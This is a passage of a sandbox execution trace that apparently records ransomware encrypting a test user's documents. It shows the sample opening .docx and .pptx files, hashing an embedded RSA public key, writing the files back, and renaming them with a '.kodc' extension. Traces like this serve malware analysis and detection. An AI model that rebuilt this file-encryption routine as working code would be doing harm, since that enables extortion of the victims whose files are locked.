phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0098.311] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0098.311] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0098.311] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0098.311] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0098.311] GetLastError () returned 0x0 [0098.311] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0098.311] CryptReleaseContext (hProv=0x692d18, dwFlags=0x0) returned 1 [0098.311] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.311] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0098.311] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0098.311] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.311] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0098.311] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.312] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.312] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x15760) returned 0x9ba4d90 [0098.312] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0098.312] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.312] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0098.312] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.312] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0098.312] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0098.312] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9cf88 [0098.312] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a940 [0098.312] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9cfd0 [0098.312] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a958 [0098.312] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a988 [0098.312] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0098.312] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a9a0 [0098.312] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0098.312] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0098.312] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0098.313] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0098.313] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a988 | out: hHeap=0x630000) returned 1 [0098.313] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a9a0 | out: hHeap=0x630000) returned 1 [0098.313] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0098.313] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0098.313] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0098.313] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0098.313] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32ceca0 [0098.313] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a9a0 [0098.313] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0098.313] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331a988 [0098.313] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecc0 [0098.313] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c658 [0098.313] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0098.313] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0098.313] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0098.313] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c770 [0098.313] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0098.313] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0098.313] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0098.313] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a9a0 | out: hHeap=0x630000) returned 1 [0098.313] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.313] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a988 | out: hHeap=0x630000) returned 1 [0098.313] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0098.313] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0098.313] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0098.313] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0098.313] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0098.313] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0098.313] GetCurrentThreadId () returned 0x42c [0098.313] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0098.313] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9b8ea58 [0098.313] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0098.313] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0098.313] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0098.313] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0098.313] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.314] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0098.314] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.314] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.314] GetCurrentThreadId () returned 0x42c [0098.314] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.314] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.314] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0098.314] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.314] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.314] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.314] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.314] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0098.314] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0098.314] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0098.314] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318ea0 [0098.314] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0098.314] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0098.314] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.314] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0098.314] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.314] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.314] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0098.314] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0098.314] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0098.314] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0098.314] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0098.314] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.314] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a988 [0098.314] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0098.314] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0098.314] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.314] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.314] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0098.314] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0098.314] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0098.314] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a9a0 [0098.315] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0098.315] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0098.315] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0098.315] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x1575c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.315] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0098.315] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0098.315] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0098.315] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0098.315] CloseHandle (hObject=0x5cc) returned 1 [0098.316] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\gUfYt.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gufyt.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\gUfYt.pptx.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gufyt.pptx.kodc")) returned 1 [0098.317] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0098.317] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.317] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.319] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c0 | out: hHeap=0x630000) returned 1 [0098.319] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8272960, ftCreationTime.dwHighDateTime=0x1d54877, ftLastAccessTime.dwLowDateTime=0x863f4110, ftLastAccessTime.dwHighDateTime=0x1d56291, ftLastWriteTime.dwLowDateTime=0x863f4110, ftLastWriteTime.dwHighDateTime=0x1d56291, nFileSizeHigh=0x0, nFileSizeLow=0xd90b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="iB9J6qmzlzOT0c.docx", cAlternateFileName="IB9J6Q~1.DOC")) returned 1 [0098.319] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iB9J6qmzlzOT0c.docx") returned=".docx" [0098.319] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iB9J6qmzlzOT0c.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ib9j6qmzlzot0c.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0098.319] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=55563) returned 1 [0098.320] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0098.323] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xd8e5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.323] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0098.324] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.324] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.324] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.324] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0xd90b, lpOverlapped=0x0) returned 1 [0098.324] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.324] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0098.324] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.324] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.324] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x692d18) returned 1 [0098.325] CryptCreateHash (in: hProv=0x692d18, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0098.325] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0098.325] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0098.325] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0098.325] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0098.325] GetLastError () returned 0x0 [0098.325] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0098.325] CryptReleaseContext (hProv=0x692d18, dwFlags=0x0) returned 1 [0098.325] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.326] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0098.326] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0098.326] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.326] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0098.326] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.326] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.326] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xd910) returned 0x9ba4d90 [0098.326] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0098.326] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.326] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0098.326] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.326] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0098.326] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0098.326] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9cfd0 [0098.326] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a958 [0098.326] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9d018 [0098.326] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a970 [0098.326] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a9a0 [0098.327] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0098.327] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a9b8 [0098.327] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0098.327] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0098.327] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0098.327] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333a888 [0098.327] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a9a0 | out: hHeap=0x630000) returned 1 [0098.327] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a9b8 | out: hHeap=0x630000) returned 1 [0098.327] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0098.327] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0098.327] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0098.327] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0098.327] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec00 [0098.327] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a9b8 [0098.327] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0098.327] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331a9a0 [0098.327] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec10 [0098.327] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c770 [0098.327] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0098.327] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0098.327] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0098.327] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c428 [0098.327] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0098.327] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0098.327] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0098.327] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a9b8 | out: hHeap=0x630000) returned 1 [0098.327] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.327] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a9a0 | out: hHeap=0x630000) returned 1 [0098.327] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0098.327] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0098.327] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0098.327] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0098.327] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0098.327] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0098.327] GetCurrentThreadId () returned 0x42c [0098.327] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0098.328] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9b8eae8 [0098.328] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0098.328] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0098.328] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0098.328] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0098.328] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.328] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0098.328] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.328] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.328] GetCurrentThreadId () returned 0x42c [0098.328] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.328] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.328] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0098.328] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.328] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.328] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.328] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.328] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0098.328] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0098.328] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 